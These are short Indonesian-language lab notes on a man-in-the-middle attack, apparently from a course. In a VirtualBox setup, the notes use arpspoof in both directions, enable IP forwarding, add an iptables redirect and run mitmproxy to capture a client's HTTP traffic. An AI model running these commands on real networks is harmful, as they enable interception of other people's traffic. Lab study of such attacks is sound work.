Man in the Middle Attack
- Mukadimah
- MITM HTTP
- MITM HTTPS
- menggunakan Etercap
Mukadimah
kabel LAN = eth0
wifi = wlan0
konsep :
intinya menipu mac address
kenapa yg ditipu Mac address ??
prinsip paket :
yg dibutuhkan :
- virtualbox : server(ubuntu server 20.04), client(kali, host)
scanning :
arp -n
misal didapat :
- ip client = 192.168.43.210
- ip server = 192.168.43.207
- ip kali = 192.168.43.30
MITM HTTP :
Kali :
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
cek:
iptables -t nat -L
dijalankan di multi terminal
arpspoof -i eth0 -t 192.168.43.210 192.168.43.207
arpspoof -i eth0 -t 192.168.43.207 192.168.43.210
mitmproxy --mode transparent
Client :
browsing ke server
mitmproxy di kali linux akan mengcapture
pertanyaan : bedanya dengan wireshark apa?
MITM HTTPS :
sama dengan cara diatas